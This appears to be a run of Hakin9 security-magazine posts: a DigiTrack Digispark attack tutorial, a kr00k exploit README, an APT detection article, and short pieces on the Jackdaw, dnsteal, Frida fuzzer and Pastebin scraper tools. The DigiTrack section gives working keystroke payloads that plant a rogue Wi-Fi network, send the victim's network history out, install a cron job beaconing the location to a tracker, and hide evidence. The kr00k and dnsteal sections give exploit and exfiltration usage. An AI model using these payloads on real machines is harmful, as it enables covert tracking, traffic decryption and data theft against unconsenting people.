DigiTrack - In 30 seconds, this attack can learn which networks a MacOS computer has connected to before, and plant a script that tracks the current IP address and Wi-Fi network every 60 seconds. 

Now includes Hardtracker - Digispark VPN buster to send the IP address and BSSID/SSID of nearby Wi-Fi networks on a MacOS computer to a Grabify tracker every 60 seconds.

This is a $5 attack that does a couple of things:

1. Inserts a Wi-Fi backdoor onto a victim computer, allowing you to capture the victim's data connection at any time when you are in Wi-Fi range.
2. Steals a list of every network the victim has ever connected to (for tracking, classifying, and hijacking data connection)
3. Inserts a tracking job that sends the IP address and currently connected network to a Grabify link every 60 seconds.

The attack DigiTrack goes: A victim leaves a MacOS computer unattended for 30 seconds. The attacker inserts a DigiSpark board loaded with an attack payload. The payload looks like this (with delays and single keystrokes removed):

DigiKeyboard.print("networksetup -setairportnetwork en0 'sneakernet' 00000000");

• We add the network "Sneakernet" to our trusted network list and connect to it.

DigiKeyboard.print("curl -m 10 --silent --output /dev/null -X POST -H "Content-Type: text/plain" --data "$(networksetup -listpreferredwirelessnetworks en0)" 192.168.4.1 &");

• After connecting, we send a CURL request listing every single network the MacOS computer has connected to in the past to the esp8266 creating the "Sneakernet" network. The & puts the process in the background in case it takes too long, and the -m sets a timer of 10 seconds to prevent it from taking too long. Now we know which Wi-Fi networks the victim has joined, and which networks will force the computer to connect without asking.

DigiKeyboard.print("export VISUAL=nano; crontab -e");

• We create a job that will execute every 60 seconds

DigiKeyboard.print("* * * * * curl --silent --output /dev/null --referer "$(/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -I | awk '/ SSID/ {print substr($0, index($0, $2))}')" https://grabi/YOURLINK");

• We suppress the output of CURL, and grab the network name of the currently connected Wi-Fi network. We sent this along with a CURL request to a tracking URL, delivering the target's IP address and currently connected Wi-Fi network every 60 seconds.

DigiKeyboard.print("wait && kill -9 $(ps -p $PPID -o ppid=)");

• Finally, we wait for all background processes to finish, and kill the shit out of the terminal window to hide the evidence.

Total run time is about 30 seconds, not including the few seconds the Digisparks waits for a sketch to upload.

Notes: Grabify may go into "I'm under attack" mode and not allow check in. Look for this line: div class="cf-browser-verification cf-im-under-attack"

If you see it, then the IP address is being blocked by cloudflare.

The post DigiTrack - Attacks for $5 or less using Arduino appeared first on Hakin9 - IT Security Magazine.

r00kie-kr00kie is a PoC exploit for the CVE-2019-15126 kr00k vulnerability.

This project is intended for educational purposes only and cannot be used for law violations or personal gain. The author of this project is not responsible for any possible harm caused by the materials.

Requirements

To use these scripts, you will need a WiFi card supporting the active monitor mode with frame injection. We recommend the Atheros AR9280 chip (IEEE 802.11n) we used to develop and test the code. We have tested this PoC on Kali Linux

Installation

# clone main repo
git clone https://github.com/hexway/r00kie-kr00kie.git && cd ./r00kie-kr00kie
# install dependencies
sudo pip3 install -r requirements.txt

How to use

Script: r00kie-kr00kie.py

This is the main exploit file that implements the kr00k attack

->~:python3 r00kie-kr00kie.py -h

usage: r00kie-kr00kie.py [-h] [-i INTERFACE] [-l CHANNEL] [-b BSSID]
                         [-c CLIENT] [-n DEAUTH_NUMBER] [-d DEAUTH_DELAY]
                         [-p PCAP_PATH_READ] [-r PCAP_PATH_RESULT] [-q]

PoC of CVE-2019-15126 kr00k vulnerability

optional arguments:
  -h, --help            show this help message and exit
  -i INTERFACE, --interface INTERFACE
                        Set wireless interface name for listen packets
  -l CHANNEL, --channel CHANNEL
                        Set channel for wireless interface (default: 1)
  -b BSSID, --bssid BSSID
                        Set WiFi AP BSSID (example: "01:23:45:67:89:0a")
  -c CLIENT, --client CLIENT
                        Set WiFi client MAC address (example:
                        "01:23:45:67:89:0b")
  -n DEAUTH_NUMBER, --deauth_number DEAUTH_NUMBER
                        Set number of deauth packets for one iteration
                        (default: 5)
  -d DEAUTH_DELAY, --deauth_delay DEAUTH_DELAY
                        Set delay between sending deauth packets (default: 5)
  -p PCAP_PATH_READ, --pcap_path_read PCAP_PATH_READ
                        Set path to PCAP file for read encrypted packets
  -r PCAP_PATH_RESULT, --pcap_path_result PCAP_PATH_RESULT
                        Set path to PCAP file for write decrypted packets
  -q, --quiet           Minimal output

In order to start an attack, you need to know bssid of access points, its channel and mac address of the victim. You can find them using the airodump-ng wlan0 utility.

Run the exploit:

->~:python3 r00kie-kr00kie.py -i wlan0 -b D4:38:9C:82:23:7A -c 88:C9:D0:FB:88:D1 -l 11

      /$$$$$$$   /$$$$$$   /$$$$$$  /$$       /$$
     | $$__  $$ /$$$_  $$ /$$$_  $$| $$      |__/
     | $$  \ $$| $$$$\ $$| $$$$\ $$| $$   /$$ /$$  /$$$$$$
     | $$$$$$$/| $$ $$ $$| $$ $$ $$| $$  /$$/| $$ /$$__  $$
     | $$__  $$| $$\ $$$$| $$\ $$$$| $$$$$$/ | $$| $$$$$$$$
     | $$  \ $$| $$ \ $$$| $$ \ $$$| $$_  $$ | $$| $$_____/
     | $$  | $$|  $$$$$$/|  $$$$$$/| $$ \  $$| $$|  $$$$$$$
     |__/  |__/ \______/  \______/ |__/  \__/|__/ \_______/



 /$$                  /$$$$$$   /$$$$$$  /$$       /$$
| $$                 /$$$_  $$ /$$$_  $$| $$      |__/
| $$   /$$  /$$$$$$ | $$$$\ $$| $$$$\ $$| $$   /$$ /$$  /$$$$$$
| $$  /$$/ /$$__  $$| $$ $$ $$| $$ $$ $$| $$  /$$/| $$ /$$__  $$
| $$$$$$/ | $$  \__/| $$\ $$$$| $$\ $$$$| $$$$$$/ | $$| $$$$$$$$
| $$_  $$ | $$      | $$ \ $$$| $$ \ $$$| $$_  $$ | $$| $$_____/
| $$ \  $$| $$      |  $$$$$$/|  $$$$$$/| $$ \  $$| $$|  $$$$$$$
|__/  \__/|__/       \______/  \______/ |__/  \__/|__/ \_______/
                                                          v0.0.1

                    https://hexway.io/research/r00kie-kr00kie/

[!] Kill processes that prevent monitor mode!
[*] Wireless interface: wlan0 already in mode monitor
[*] Set channel: 11 on wireless interface: wlan0
[*] Send 5 deauth packets to: 88:C9:D0:FB:88:D1 from: D4:38:9C:82:23:7A
[*] Send 5 deauth packets to: 88:C9:D0:FB:88:D1 from: D4:38:9C:82:23:7A
[*] Send 5 deauth packets to: 88:C9:D0:FB:88:D1 from: D4:38:9C:82:23:7A
[+] Got a kr00ked packet:
###[ Ethernet ]###
  dst       = d4:38:9c:82:23:7a
  src       = 88:c9:d0:fb:88:d1
  type      = IPv4
###[ IP ]###
     version   = 4
     ihl       = 5
     tos       = 0x0
     len       = 60
     id        = 30074
     flags     = DF
     frag      = 0
     ttl       = 64
     proto     = udp
     chksum    = 0xcce1
     src       = 192.168.43.161
     dst       = 8.8.4.4
     \options   \
###[ UDP ]###
        sport     = 60744
        dport     = domain
        len       = 40
        chksum    = 0xa649
###[ DNS ]###
           id        = 55281
           qr        = 0
           opcode    = QUERY
           aa        = 0
           tc        = 0
           rd        = 1
           ra        = 0
           z         = 0
           ad        = 0
           cd        = 0
           rcode     = ok
           qdcount   = 1
           ancount   = 0
           nscount   = 0
           arcount   = 0
           \qd        \
            |###[ DNS Question Record ]###
            |  qname     = 'g.whatsapp.net.'
            |  qtype     = A
            |  qclass    = IN
           an        = None
           ns        = None
           ar        = None

[+] Got a kr00ked packet:
###[ Ethernet ]###
  dst       = d4:38:9c:82:23:7a
  src       = 88:c9:d0:fb:88:d1
  type      = IPv4
###[ IP ]###
     version   = 4
     ihl       = 5
     tos       = 0x0
     len       = 60
     id        = 30075
     flags     = DF
     frag      = 0
     ttl       = 64
     proto     = udp
     chksum    = 0xcce0
     src       = 192.168.43.161
     dst       = 8.8.4.4
     \options   \
###[ UDP ]###
        sport     = 60744
        dport     = domain
        len       = 40
        chksum    = 0x104b
###[ DNS ]###
           id        = 28117
           qr        = 0
           opcode    = QUERY
           aa        = 0
           tc        = 0
           rd        = 1
           ra        = 0
           z         = 0
           ad        = 0
           cd        = 0
           rcode     = ok
           qdcount   = 1
           ancount   = 0
           nscount   = 0
           arcount   = 0
           \qd        \
            |###[ DNS Question Record ]###
            |  qname     = 'g.whatsapp.net.'
            |  qtype     = AAAA
            |  qclass    = IN
           an        = None
           ns        = None
           ar        = None

Also, if you have already intercepted traffic (pcap file) after the kr00t the attack, you can decrypt:

->~:python3 r00kie-kr00kie.py -p encrypted_packets.pcap

      /$$$$$$$   /$$$$$$   /$$$$$$  /$$       /$$
     | $$__  $$ /$$$_  $$ /$$$_  $$| $$      |__/
     | $$  \ $$| $$$$\ $$| $$$$\ $$| $$   /$$ /$$  /$$$$$$
     | $$$$$$$/| $$ $$ $$| $$ $$ $$| $$  /$$/| $$ /$$__  $$
     | $$__  $$| $$\ $$$$| $$\ $$$$| $$$$$$/ | $$| $$$$$$$$
     | $$  \ $$| $$ \ $$$| $$ \ $$$| $$_  $$ | $$| $$_____/
     | $$  | $$|  $$$$$$/|  $$$$$$/| $$ \  $$| $$|  $$$$$$$
     |__/  |__/ \______/  \______/ |__/  \__/|__/ \_______/



 /$$                  /$$$$$$   /$$$$$$  /$$       /$$
| $$                 /$$$_  $$ /$$$_  $$| $$      |__/
| $$   /$$  /$$$$$$ | $$$$\ $$| $$$$\ $$| $$   /$$ /$$  /$$$$$$
| $$  /$$/ /$$__  $$| $$ $$ $$| $$ $$ $$| $$  /$$/| $$ /$$__  $$
| $$$$$$/ | $$  \__/| $$\ $$$$| $$\ $$$$| $$$$$$/ | $$| $$$$$$$$
| $$_  $$ | $$      | $$ \ $$$| $$ \ $$$| $$_  $$ | $$| $$_____/
| $$ \  $$| $$      |  $$$$$$/|  $$$$$$/| $$ \  $$| $$|  $$$$$$$
|__/  \__/|__/       \______/  \______/ |__/  \__/|__/ \_______/
                                                          v0.0.1

                    https://hexway.io/research/r00kie-kr00kie/

[*] Read packets from: encrypted_packets.pcap ....
[*] All packets are read, packet analysis is in progress ....
[+] Got a kr00ked packet:
###[ Ethernet ]###
  dst       = d4:38:9c:82:23:7a
  src       = 88:c9:d0:fb:88:d1
  type      = IPv4
###[ IP ]###
     version   = 4
     ihl       = 5
     tos       = 0x0
     len       = 490
     id        = 756
     flags     = DF
     frag      = 0
     ttl       = 64
     proto     = tcp
     chksum    = 0xd0ca
     src       = 192.168.43.161
     dst       = 1.1.1.1
     \options   \
###[ TCP ]###
        sport     = 34789
        dport     = 1337
        seq       = 3463744441
        ack       = 3909086929
        dataofs   = 8
        reserved  = 0
        flags     = PA
        window    = 1369
        chksum    = 0x65ee
        urgptr    = 0
        options   = [('NOP', None), ('NOP', None), ('Timestamp', (1084858, 699843440))]
###[ Raw ]###
           load      = 'POST /post_form.html HTTP/1.1\r\nHost: sfdsfsdf:1337\r\nConnection: keep-alive\r\nContent-Length: 138240\r\nOrigin: http://sfdsfsdf.ch:1337\r\nUser-Agent: Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36\r\nContent-Type: application/json\r\nAccept: */*\r\nReferer: http://sfdsfsdf.ch:1337/post_form.html\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9,ru;q=0.8\r\n\r\n'

[+] Got a kr00ked packet:
###[ Ethernet ]###
  dst       = d4:38:9c:82:23:7a
  src       = 88:c9:d0:fb:88:d1
  type      = IPv4
###[ IP ]###
     version   = 4
     ihl       = 5
     tos       = 0x0
     len       = 60
     id        = 42533
     flags     = DF
     frag      = 0
     ttl       = 64
     proto     = tcp
     chksum    = 0x2f47
     src       = 192.168.43.161
     dst       = 1.1.1.1
     \options   \
###[ TCP ]###
        sport     = 34792
        dport     = 1337
        seq       = 71773087
        ack       = 0
        dataofs   = 10
        reserved  = 0
        flags     = S
        window    = 65535
        chksum    = 0x97df
        urgptr    = 0
        options   = [('MSS', 1460), ('SAckOK', b''), ('Timestamp', (1084858, 0)), ('NOP', None), ('WScale', 6)]

[+] Got a kr00ked packet:
###[ Ethernet ]###
  dst       = d4:38:9c:82:23:7a
  src       = 88:c9:d0:fb:88:d1
  type      = IPv4
###[ IP ]###
     version   = 4
     ihl       = 5
     tos       = 0x0
     len       = 1460
     id        = 35150
     flags     = DF
     frag      = 0
     ttl       = 64
     proto     = tcp
     chksum    = 0x46a6
     src       = 192.168.43.161
     dst       = 1.1.1.1
     \options   \
###[ TCP ]###
        sport     = 36020
        dport     = 1337
        seq       = 395101552
        ack       = 1111748198
        dataofs   = 8
        reserved  = 0
        flags     = A
        window    = 1369
        chksum    = 0x35d2
        urgptr    = 0
        options   = [('NOP', None), ('NOP', None), ('Timestamp', (1113058, 700129572))]
###[ Raw ]###
           load      = "pik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can"

[+] Got a kr00ked packet:
###[ Ethernet ]###
  dst       = d4:38:9c:82:23:7a
  src       = 88:c9:d0:fb:88:d1
  type      = IPv4
###[ IP ]###
     version   = 4
     ihl       = 5
     tos       = 0x0
     len       = 60
     id        = 17897
     flags     = DF
     frag      = 0
     ttl       = 64
     proto     = tcp
     chksum    = 0x8f83
     src       = 192.168.43.161
     dst       = 95.85.25.177
     \options   \
###[ TCP ]###
        sport     = 36266
        dport     = 1337
        seq       = 3375779416
        ack       = 0
        dataofs   = 10
        reserved  = 0
        flags     = S
        window    = 65535
        chksum    = 0x2c7d
        urgptr    = 0
        options   = [('MSS', 1460), ('SAckOK', b''), ('Timestamp', (1117105, 0)), ('NOP', None), ('WScale', 6)]

[+] Found 4 kr00ked packets and decrypted packets saved in: kr00k.pcap

Script: traffic_generator.py

This script generates UDP traffic from the victim, to demonstrate the kr00k attack

->~:python3 traffic_generator.py
Sending payload to the UDP port 53 on 8.8.8.8
 Press Ctrl+C to exit

The post r00kie-kr00kie: PoC exploit for the CVE-2019-15126 kr00k vulnerability appeared first on Hakin9 - IT Security Magazine.

An advanced persistent threat (APT) is a cyberattack that is executed by an organized group of skilled actors. These attacks are carefully planned and conducted against strategic targets and extend over a prolonged period. Often, these attacks are sponsored by nation-states or criminal organizations. In this article, you will learn about the six stages of APT attacks, how to detect APTs, and how to prevent APTs.

What Is an Advanced Persistent Threat?

APTs are typically carried out as multi-staged, compound attacks. These attacks employ a variety of techniques and numerous attack vectors, including zero-day attacks, lateral movement, credential theft, and malware. Often, APTs use multiple simultaneous attacks to obscure successful breaches. 

The goals of APT attackers typically include:

• Theft of classified data, intellectual property, or personally identifiable information (PII)
• Sabotage, including deletion or manipulation of data
• Takeover or abuse of resources
• Reconnaissance for future attacks
• Administrative credential theft or creation

APT Attack Stages

APT attacks occur in multiple stages that vary in length depending on the lifecycle of the attack These stages include:

1. Initial access

APT attacks begin when attackers gain initial access. This is accomplished through compromised users, network connections, or web-based systems. Access is gained through methods such as exploitation of system vulnerabilities, spear phishing of privileged credentials, malicious uploads, or misconfigurations in security tooling.

2. Deploy malware and secure access

Once access is gained, it is secured via the installation of backdoor shells, trojans, creation of credentials, or other malware. Whichever method is used, the purpose is to create both inbound and outbound access to a command and control center. 

3. Move laterally and expand access

After access is secured, attackers focus on increasing that access and moving laterally through your networks. This is accomplished using information gained in the initial steps or by brute forcing or exploiting vulnerabilities from within your systems. Often, attackers create additional backdoors or tunnels to further secure and expand access. 

4. Stage the attack

Eventually, attackers have enough knowledge and access to your systems to identify their objective data or processes. At this point, they begin preparing data for exfiltration, implementing control measures, or modifying systems and data. 

5. Attack execution

After preparations are complete, criminals execute their attack. This is frequently done under the cover of another attack, such as a distributed denial of service (DDoS) attack. This distracts security teams and enables attackers to exfiltrate data or make system changes without detection. It also provides attackers cover to remove traces of the attack, increasing the chance that access can be regained and preventing prosecution or tracing.

6. Follow-up attacks

Frequently, APTs persist after an initial attack in the hopes of gaining greater access or additional data. If not detected during the execution stage, attackers can continue using their secured access routes and gain the opportunity to automatically bypass new or updated controls with you might institute. 

How to Detect APTs

Detecting APTs can be a challenge. Attackers are well prepared and often use more advanced measures than standard attacks. However, detection is not impossible. The following tools can help you detect attackers and any damage they may cause. 

User and entity behavior analytics (UEBA)

UEBA is an essential tool for detecting and tracing APTs. This method doesn’t rely on attack signatures and enables you to detect attacks of almost any type. 

It uses artificial intelligence (AI) and machine learning (ML) to collect and analyze network events. From these analyses, UEBA tools create baselines of “normal” behavior against which new events are measured. If an event falls outside the expected range of behavior, security teams are alerted or defenses are deployed. 

Deception technology

Deception technology uses traps baited with appealing, but fake, data and access. These traps serve no legitimate purpose and provide a near 100% positive alert rate. When attackers are attempting to enter or are traversing your network, they are lured to these traps. As long as traps are well designed, attackers may never know that they have been tricked. Meanwhile, you can observe and track their movements and activities and limit their access. 

Network monitoring

While network monitoring isn’t as novel as UEBA or deception technology, it forms the base of APT detection. Without monitoring, you cannot collect network information or determine the source of attacks. To be effective, this monitoring needs to cover the entirety of your network, including all endpoints and connected systems.

How to Prevent APTs

While detecting APT attacks is key, preventing attacks is ideal. To increase your chances of successfully preventing attacks, consider adopting the following practices.

Perform penetration testing

Penetration testing can help you uncover unknown vulnerabilities and test the effectiveness of your implemented tools. It enables you to mimic the actions and methods that attackers might use and can provide immediate feedback on how you can improve systems. 

You can perform penetration testing internally, with red (attack) and blue (defense) teams or with a third-party service. Alternatively, you might institute a bug bounty program. These programs encourage independent security testers to try and infiltrate your systems and report any vulnerabilities they may find.

Educate your employees

One of the most common methods of gaining system access is through the use of compromised credentials. These credentials may be stolen through phishing campaigns, false log-in portals, or brute force. Weak password controls also put credentials at risk.

To avoid these liabilities, you need to train your employees to recognize and avoid tactics used for credential theft. For example, training on how to recognize and report spam emails. You should also educate your users on how to create strong passwords and why it’s important to not reuse or share credential information. 

Keep your systems updated

A common tactic used to gain or expand access in APTs is the exploitation of existing vulnerabilities. In particular, known vulnerabilities that have not been patched. By making sure that your systems remain up-to-date you can easily eliminate these vulnerabilities as points of entry. 

To ensure that you remain aware of current updates and to verify that your systems are fully patched, you need to monitor your versions. The easiest way to do this is with a software composition analysis (SCA) solution. These solutions can help inventory your systems, identify the components you’re using, monitor for vulnerability announcements or patch releases, and alert you when components are out of date. 

Limit system access

The most effective way to limit system access is by applying defense-in-depth (DiD) and the principle of least privilege. DiD involves securing your systems throughout, as opposed to just on the perimeter. This includes the use of internal firewalls and internal traffic filtering. 

The principle of least privilege complements DiD by specifying that users and applications should be given only the minimum amount of required access. In combination, these strategies can help limit an attacker’s ability to traverse your networks. The combination can also significantly slow down access, giving you more time to detect and halt an attack. 

Conclusion

APTs are long-term attacks typically carried out in six stages: initial access, malware deployment, lateral movement, attack setup, attack launch, and then follow-up attacks. You can detect APTs by using tools like UEBA, deception technology, and network monitoring. You can prevent APTs by performing penetration testing, educating employees on proper cyber security standards, limiting access to systems, and keeping your systems updated.

About the Author: 

Gilad David Maayan is a technology writer who has worked with over 150 technology companies including SAP, Samsung NEXT, NetApp and Imperva, producing technical and thought leadership content that elucidates technical solutions for developers and IT leadership.

LinkedIn: https://www.linkedin.com/in/giladdavidmaayan/

The post How to Prevent and Detect APT Attacks by Gilad David Maayan appeared first on Hakin9 - IT Security Magazine.

Jackdaw is here to collect all information in your domain, store it in a SQL database and show you nice graphs on how your domain objects interact with each other and how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passwords/users.

Example commands of Jackdaw

Most of these commands are available already from the webapi, except for the database init.

DB init

jackdaw --sql sqlite:///<full path here>/test.db dbinit

Enumeration

Full enumeration with integrated sspi - windows only

jackdaw --sql sqlite:///test.db enum 'ldap+sspi://10.10.10.2' 'smb+sspi-ntlm://10.10.10.2'

Full enumeration with username and password - platform-independent

The password is Passw0rd!
jackdaw --sql sqlite:///test.db enum 'ldap://TEST\victim:Passw0rd!@10.10.10.2' 'smb+ntlm-password://TEST\victim:Passw0rd!@10.10.10.2'

LDAP-only enumeration with username and password - platform-independent

The password is Passw0rd!
jackdaw --sql sqlite:///test.db ldap 'ldap://TEST\victim:Passw0rd!@10.10.10.2'

Start an interactive web interface to plot graph and access additional features

jackdaw --sql sqlite:///<FULL PATH TO DB> nest

Open http://127.0.0.1:5000/ui for the API

Please see the Building the UI section further down to learn how to build the UI. Once built:

Open http://127.0.0.1:5000/nest for the graph interface (shows the graph, but far from working)

Features

Data acquisition

via LDAP

LDAP enumeration phase acquires data on AD info, User, Machine, OU, Group objects which will be represented as a node in the graph, and as a separate table in the DB. Additionally, all aforementioned objects' Security Descriptior will be parsed and the ACLs for the DACL added to the DB. This, together with the membership information will be represented as edges in the graph. Additionally, custom SQL queries can be performed on any of the aforementioned data types when needed.

via SMB

SMB enumeration phase acquires data on shares, localgroups, sessions, NTLM data via connecting to each machine in the domain (which is acquired via LDAP)

via LSASS dumps (optional)

The framework allows users to upload LSASS memory dumps to store credentials and extend the session information table. Both will be used as additional edges in the graph (shared password and session respectively). The framework also uses this information to create a password report on weak/shared/cracked credentials.

via DCSYNC results (optional)

The framework allows users to upload impacket's DCSYNC files to store credentials. This is used as additional edges in the graph (shared password). The framework also uses this information to create a password report on weak/shared/cracked credentials.

via manual upload (optional)

The framework allows manually extending the available DB in every aspect. Example: when user-session information on a given computer is discovered (outside of the automatic enumeration) there is a possibility to manually upload these sessions, which will populate the DB and also the resulting graph

Graph

The framework can generate a graph using the available information in the database and plot it via the web UI (nest). Furthermore, the graph generation and path calculations can be invoked programmatically, either by using the web API (/UI endpoint) or the graph object's functions.

Anomalies detection

The framework can identify common AD misconfigurations without graph generation. Currently only via the web API.

User

User anomalies detection involves the detection of insecure UAC permissions and extensive user description values. This feature set is expected to grow in the future as new features will be implemented.

Machine

Machine anomalies detection involves detection of insecure UAC permissions, non-mandatory SMB singing, outdated OS version, out-of-domain machines. This feature set is expected to grow in the future as new features will be implemented.

Password cracking

The framework is not performing any cracking, only organizing the hashes, and the cracking results currently main focus is on impacket and aiosmb's dcsync results! NT and LM hashes only!

Sample process is the following:

1. Harvesting credentials as a text file via impacket/aiosmb or as memory dumps of the LSASS process via whatever tool you see fit.
2. Upload the harvested credentials via the API
3. Poll uncracked hashes via the API
4. Crack them (hashcat?)
5. Upload the results to the framework via the API
6. Generate a report on the cracked/uncracked users and password strength and password sharing

Note from the author: This feature was implemented for both attackers and defenders. Personally I don't see much-added value on either side since at the point one obtained the NT hash of a user it's just as good as the password... Nonetheless, more and more companies are performing password strength exercises, and this feature would help them. As for attackers: it is just showing off at this point, but be my guest. Maybe scare management for extra points.

Important

This project is in the experimental phase! This means multiple things:

1. it may crash
2. the controls you are using might change in the future (most likely)
3. (the worst part) The database design is not necessarily suitable for future requests so it may change. There will be no effort to maintain backward compatibility with the experimental-phase DB structure!

Technical part of Jackdaw

Database backend

Jackdaw uses SQLAlchemy ORM module, which gives you the option to use any SQL DB backend you like. The tests are mainly done on SQLite for obvious reasons. There will be no backend-specific commands used in this project that would limit you.

Building the UI

THIS IS ONLY NEEDED IF YOU INSTALL VIA GIT AND/OR CHANGE SOMETHING IN THE UI CODE.

The UI was written in React. Before the first use/installation, you have to build it. For this, you will need nodejs and npm installed. Then:

1. Go to jackdaw/nest/site/nui
2. Run npm install
3. Run npm run build

Once done with the above, the UI is ready to play with.

Kudos

"If I have seen further it is by standing on the shoulders of Giants."

For the original idea

BloodHound team

For the ACL edge calculation

@dirkjanm (https://github.com/dirkjanm/)

For the awesome UI

Zsolt Imre (https://github.com/keymandll)

For the data collection parts

please see kudos section in aiosmb and msldap modules

In case I forgot to mention someone pls send a PR

More about Jackdaw: https://github.com/skelsec/jackdaw

The post Jackdaw - Tool To Collect All Information In Your Domain appeared first on Hakin9 - IT Security Magazine.

This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.

Below are a couple of different images showing examples of multiple file transfer and single verbose file transfer:

• Support for multiple files
• Gzip compression supported
• Now supports the customization of subdomains and bytes per subdomain and the length of filename

See help below:

If you do not understand the help, then just use the program with default options!

python dnsteal.py 127.0.0.1 -z -v

This one would send 45 bytes per subdomain, of which there are 4 in the query. 15 bytes reserved for filename at the end.

python dnsteal.py 127.0.0.1 -z -v -b 45 -s 4 -f 15

This one would leave no space for filename.

python dnsteal.py 127.0.0.1 -z -v -b 63 -s 4 -f 0

The post dnsteal - DNS Exfiltration tool for stealthily sending files over DNS requests appeared first on Hakin9 - IT Security Magazine.

This experimental fuzzer is meant to be used for API in-memory fuzzing.

The design is highly inspired and based on AFL/AFL++.

ATM the mutator is quite simple, just the AFL's havoc and splice stages.

I tested only the examples under tests/, this is a WIP project but is known to works at least on GNU/Linux x86_64 and Android x86_64.

You need Frida >= 12.8.1 to run this (pip3 install -U frida) and frida-tools to compile the harness.

Usage

The fuzz library has to be imported into a custom harness and then compiled with frida-compile to generate the agent that frida-fuzzer will inject into the target app.

The majority of the logic of the fuzzer is in the agent.

A harness has the following format:

var fuzz = require("./fuzz");

var TARGET_MODULE = "test_linux64";
var TARGET_FUNCTION = DebugSymbol.fromName("target_func").address;;
var RET_TYPE = "void";
var ARGS_TYPES = ['pointer', 'int'];

var func_handle = new NativeFunction(TARGET_FUNCTION, RET_TYPE, ARGS_TYPES, { traps: 'all' });

fuzz.target_module = TARGET_MODULE;

var payload_mem = Memory.alloc(fuzz.config.MAX_FILE);

fuzz.fuzzer_test_one_input = function (/* Uint8Array */ payload) {

  Memory.writeByteArray(payload_mem, payload, payload.length);

  func_handle(payload_mem, payload.length);

}

fuzz.fuzzer_test_one_input is mandatory. If you don't specify fuzz.target_module, all the code executed will be instrumented.

You can also set fuzz.manual_loop_start = true to tell the fuzzer that you will call fuzz.fuzzing_loop() in a callback and so it must not call it for you (e.g. to start fuzzing when a button is clicked in the Android app).

The callback fuzz.init_callback can be set to execute code when the fuzzer is ready to begin. See tests/test_java.jsfor an example.

fuzz.dictionary is a classic fuzzer dictionary, an array in which you can add items (accepted types are Array, ArrayBuffer, Uint8Array, String) that are used as additional values in the mutator. See tests/test_libxml2.js for example.

frida-fuzzer accepts the following arguments:

If you don't specify the output folder, a temp folder is created under /tmp. If you don't specify the folder with the initial seed, an uninformed seed 0000 is used as a starting seed.

If you are fuzzing a local application, you may want to execute system-config before frida-fuzzer to tune the parameters of your system and speed-up the things.

Running ./frida-fuzzer -spawn ./tests/test_linux64 you will see something like the following status screen on your terminal:

You can also easily add a custom stage in fuzz/fuzzer.js and add it to the stages list in fuzz/index.js.

To customize the fuzzer, edit fuzz/config.js. The variables that you may want to change are MAP_SIZE (If the code that you are fuzzing is small you can reduce it and gain a bit of speed), MAX_FILE (the maximum size of generated input) and QUEUE_CACHE_MAX_SIZE (increase the queue cache size for more speed, especially on Android).

Example

Let's fuzz the native shared library in the example Android app in tests.

Make sure you have root on your virtual device:

host$ adb root

Download the Android x86_64 frida-server from the repo release page and copy it on the device under /data/local/tmp (use adb push).

Start a shell and run the frida-server:

device# cd /data/local/tmp
device# ./frida-server

Now install the test app tests/app-debug.apk using the drag & drop into the emulator window.

Then, open the app.

Compile the agent script with Frida-compile:

host$ frida-compile -x tests/test_ndk_x64.js -o fuzzer-agent.js

Open the app in the emulator.

Fuzz the test_func function of the libnative-lib.so library shipped with the test app with the command:

host$ ./frida-fuzzer -U -o output_folder/ com.example.ndktest1

Interesting test cases and crashes are both saved into output_folder.

Enjoy.

TODO

Hey OSS community, there are a lot of TODOs if someone wants to contribute.

• Java code fuzzing (waiting for additional exposed methods in frida-java-bridge, should be easy, almost done)
• splice stage (merge two testcase in queue and apply havoc on it)
• support dictionaries (and so modify also havoc)
• seed selection
• inlined instrumentation for arm64
• performance scoring (explore schedule of AFL)
• structural mutator (mutate bytes based on a grammar written in JSON)
• CompareCoverage (sub-instruction profiling to bypass fuzzing roadblocks)
• rewrite frida-fuzzer in C with frida-core to be able to run all stuff on the mobile device

If you have doubts on one of these featues feel free to DM me on Twitter.

For features proposals, there is the Issues section.

More: https://github.com/andreafioraldi/frida-fuzzer

The post Frida API Fuzzer - experimental fuzzer meant to be used for API in-memory fuzzing. appeared first on Hakin9 - IT Security Magazine.

This is a Web Scraping application built on Flask. This web application utilizes Pastebin Scraping API and scrapes IOCs including IP addresses, domains, hashes, and emails from the latest pastes of Pastebin. It uses Elasticsearch as the database to store the pastes and Kibana is used for visualizing data from Elasticsearch.

Prerequisites

• Python
• Flask
• Requests
• Elasticsearch 5.6
• BeautifulSoup
• Kibana

Usage

• Enter your Pastebing Scraping API key and Flask secret key in the code
• Run the PastebinScrapy.py file
• Open 127.0.0.1:5000 in any browser
• Open 127.0.0.1:5601 in any browser to see the Kibana dashboard

Screenshots

More: https://github.com/apurvsinghgautam/PastebinScrapy

The post PastebinScrapy - Flask application for scraping latest scrapes from Pastebin appeared first on Hakin9 - IT Security Magazine.

In this tutorial from our Security Incident Response course you will see how to use the LogonSessions tool from Windows Sysinternals in incident response. Want to add something to your toolbox? Let's dive in! 

